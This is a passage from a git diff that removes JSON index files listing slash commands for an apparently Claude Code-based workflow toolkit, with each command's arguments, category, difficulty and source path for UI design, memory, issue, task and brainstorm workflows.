"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/explore-auto.md"
|
||||
},
|
||||
{
|
||||
"name": "generate",
|
||||
"command": "/workflow:ui-design:generate",
|
||||
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
|
||||
"arguments": "[--design-id <id>] [--session <id>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/generate.md"
|
||||
},
|
||||
{
|
||||
"name": "imitate-auto",
|
||||
"command": "/workflow:ui-design:imitate-auto",
|
||||
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
|
||||
"arguments": "[--input \"<value>\"] [--session <id>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:import-from-code",
|
||||
"command": "/workflow:ui-design:import-from-code",
|
||||
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/import-from-code.md"
|
||||
},
|
||||
{
|
||||
"name": "layout-extract",
|
||||
"command": "/workflow:ui-design:layout-extract",
|
||||
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/layout-extract.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:reference-page-generator",
|
||||
"command": "/workflow:ui-design:reference-page-generator",
|
||||
"description": "Generate multi-component reference pages and documentation from design run extraction",
|
||||
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
|
||||
},
|
||||
{
|
||||
"name": "style-extract",
|
||||
"command": "/workflow:ui-design:style-extract",
|
||||
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/style-extract.md"
|
||||
}
|
||||
]
|
||||
@@ -1,914 +0,0 @@
|
||||
{
|
||||
"cli": {
|
||||
"_root": [
|
||||
{
|
||||
"name": "cli-init",
|
||||
"command": "/cli:cli-init",
|
||||
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
|
||||
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
|
||||
"category": "cli",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/cli/cli-init.md"
|
||||
}
|
||||
]
|
||||
},
|
||||
"general": {
|
||||
"_root": [
|
||||
{
|
||||
"name": "enhance-prompt",
|
||||
"command": "/enhance-prompt",
|
||||
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
|
||||
"arguments": "user input to enhance",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/enhance-prompt.md"
|
||||
},
|
||||
{
|
||||
"name": "version",
|
||||
"command": "/version",
|
||||
"description": "Display Claude Code version information and check for updates",
|
||||
"arguments": "",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/version.md"
|
||||
}
|
||||
]
|
||||
},
|
||||
"issue": {
|
||||
"_root": [
|
||||
{
|
||||
"name": "issue:discover",
|
||||
"command": "/issue:discover",
|
||||
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
|
||||
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/discover.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/issue:execute",
|
||||
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
|
||||
"arguments": "[--worktree] [--queue <queue-id>]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "new",
|
||||
"command": "/issue:new",
|
||||
"description": "Create structured issue from GitHub URL or text description",
|
||||
"arguments": "<github-url | text-description> [--priority 1-5]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/new.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/issue:plan",
|
||||
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
|
||||
"arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3] ",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "queue",
|
||||
"command": "/issue:queue",
|
||||
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
|
||||
"arguments": "[--rebuild] [--issue <id>]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/queue.md"
|
||||
}
|
||||
]
|
||||
},
|
||||
"memory": {
|
||||
"_root": [
|
||||
{
|
||||
"name": "code-map-memory",
|
||||
"command": "/memory:code-map-memory",
|
||||
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
|
||||
"arguments": "\\\"feature-keyword\\\" [--regenerate] [--tool <gemini|qwen>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/code-map-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "compact",
|
||||
"command": "/memory:compact",
|
||||
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
|
||||
"arguments": "[optional: session description]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/compact.md"
|
||||
},
|
||||
{
|
||||
"name": "docs-full-cli",
|
||||
"command": "/memory:docs-full-cli",
|
||||
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs-full-cli.md"
|
||||
},
|
||||
{
|
||||
"name": "docs-related-cli",
|
||||
"command": "/memory:docs-related-cli",
|
||||
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
|
||||
"arguments": "[--tool <gemini|qwen|codex>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs-related-cli.md"
|
||||
},
|
||||
{
|
||||
"name": "docs",
|
||||
"command": "/memory:docs",
|
||||
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs.md"
|
||||
},
|
||||
{
|
||||
"name": "load-skill-memory",
|
||||
"command": "/memory:load-skill-memory",
|
||||
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
|
||||
"arguments": "[skill_name] \\\"task intent description\\",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "load",
|
||||
"command": "/memory:load",
|
||||
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
|
||||
"arguments": "[--tool gemini|qwen] \\\"task context description\\",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load.md"
|
||||
},
|
||||
{
|
||||
"name": "skill-memory",
|
||||
"command": "/memory:skill-memory",
|
||||
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "style-skill-memory",
|
||||
"command": "/memory:style-skill-memory",
|
||||
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
|
||||
"arguments": "[package-name] [--regenerate]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/style-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "swagger-docs",
|
||||
"command": "/memory:swagger-docs",
|
||||
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/swagger-docs.md"
|
||||
},
|
||||
{
|
||||
"name": "tech-research-rules",
|
||||
"command": "/memory:tech-research-rules",
|
||||
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
|
||||
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/tech-research-rules.md"
|
||||
},
|
||||
{
|
||||
"name": "update-full",
|
||||
"command": "/memory:update-full",
|
||||
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
|
||||
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-full.md"
|
||||
},
|
||||
{
|
||||
"name": "update-related",
|
||||
"command": "/memory:update-related",
|
||||
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
|
||||
"arguments": "[--tool gemini|qwen|codex]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-related.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow-skill-memory",
|
||||
"command": "/memory:workflow-skill-memory",
|
||||
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
|
||||
"arguments": "session <session-id> | all",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/workflow-skill-memory.md"
|
||||
}
|
||||
]
|
||||
},
|
||||
"task": {
|
||||
"_root": [
|
||||
{
|
||||
"name": "breakdown",
|
||||
"command": "/task:breakdown",
|
||||
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/breakdown.md"
|
||||
},
|
||||
{
|
||||
"name": "create",
|
||||
"command": "/task:create",
|
||||
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
|
||||
"arguments": "\\\"task title\\",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/create.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/task:execute",
|
||||
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/task:replan",
|
||||
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
|
||||
"arguments": "task-id [\\\"text\\\"|file.md] | --batch [verification-report.md]",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/replan.md"
|
||||
}
|
||||
]
|
||||
},
|
||||
"workflow": {
|
||||
"_root": [
|
||||
{
|
||||
"name": "action-plan-verify",
|
||||
"command": "/workflow:action-plan-verify",
|
||||
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/action-plan-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "clean",
|
||||
"command": "/workflow:clean",
|
||||
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
|
||||
"arguments": "[--dry-run] [\\\"focus area\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/clean.md"
|
||||
},
|
||||
{
|
||||
"name": "debug",
|
||||
"command": "/workflow:debug",
|
||||
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
|
||||
"arguments": "\\\"bug description or error message\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/debug.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/workflow:execute",
|
||||
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "init",
|
||||
"command": "/workflow:init",
|
||||
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
|
||||
"arguments": "[--regenerate]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/init.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-execute",
|
||||
"command": "/workflow:lite-execute",
|
||||
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
|
||||
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-fix",
|
||||
"command": "/workflow:lite-fix",
|
||||
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
|
||||
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-plan",
|
||||
"command": "/workflow:lite-plan",
|
||||
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
|
||||
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/workflow:plan",
|
||||
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
|
||||
"arguments": "\\\"text description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/workflow:replan",
|
||||
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
|
||||
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "review-fix",
|
||||
"command": "/workflow:review-fix",
|
||||
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
|
||||
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "review-module-cycle",
|
||||
"command": "/workflow:review-module-cycle",
|
||||
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
|
||||
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-module-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review-session-cycle",
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
|
||||
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-session-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review",
|
||||
"command": "/workflow:review",
|
||||
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
|
||||
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-plan",
|
||||
"command": "/workflow:tdd-plan",
|
||||
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
|
||||
"arguments": "\\\"feature description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tdd-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-verify",
|
||||
"command": "/workflow:tdd-verify",
|
||||
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
|
||||
"arguments": "[optional: WFS-session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tdd-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "test-cycle-execute",
|
||||
"command": "/workflow:test-cycle-execute",
|
||||
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-cycle-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "test-fix-gen",
|
||||
"command": "/workflow:test-fix-gen",
|
||||
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
|
||||
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-fix-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "test-gen",
|
||||
"command": "/workflow:test-gen",
|
||||
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
|
||||
"arguments": "source-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-gen.md"
|
||||
}
|
||||
],
|
||||
"brainstorm": [
|
||||
{
|
||||
"name": "api-designer",
|
||||
"command": "/workflow:brainstorm:api-designer",
|
||||
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/api-designer.md"
|
||||
},
|
||||
{
|
||||
"name": "artifacts",
|
||||
"command": "/workflow:brainstorm:artifacts",
|
||||
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
|
||||
"arguments": "topic or challenge description [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/artifacts.md"
|
||||
},
|
||||
{
|
||||
"name": "auto-parallel",
|
||||
"command": "/workflow:brainstorm:auto-parallel",
|
||||
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
|
||||
"arguments": "topic or challenge description\" [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
|
||||
},
|
||||
{
|
||||
"name": "data-architect",
|
||||
"command": "/workflow:brainstorm:data-architect",
|
||||
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/data-architect.md"
|
||||
},
|
||||
{
|
||||
"name": "product-manager",
|
||||
"command": "/workflow:brainstorm:product-manager",
|
||||
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/product-manager.md"
|
||||
},
|
||||
{
|
||||
"name": "product-owner",
|
||||
"command": "/workflow:brainstorm:product-owner",
|
||||
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/product-owner.md"
|
||||
},
|
||||
{
|
||||
"name": "scrum-master",
|
||||
"command": "/workflow:brainstorm:scrum-master",
|
||||
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
|
||||
},
|
||||
{
|
||||
"name": "subject-matter-expert",
|
||||
"command": "/workflow:brainstorm:subject-matter-expert",
|
||||
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
|
||||
},
|
||||
{
|
||||
"name": "synthesis",
|
||||
"command": "/workflow:brainstorm:synthesis",
|
||||
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/synthesis.md"
|
||||
},
|
||||
{
|
||||
"name": "system-architect",
|
||||
"command": "/workflow:brainstorm:system-architect",
|
||||
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/system-architect.md"
|
||||
},
|
||||
{
|
||||
"name": "ui-designer",
|
||||
"command": "/workflow:brainstorm:ui-designer",
|
||||
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
|
||||
},
|
||||
{
|
||||
"name": "ux-expert",
|
||||
"command": "/workflow:brainstorm:ux-expert",
|
||||
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
|
||||
}
|
||||
],
|
||||
"session": [
|
||||
{
|
||||
"name": "complete",
|
||||
"command": "/workflow:session:complete",
|
||||
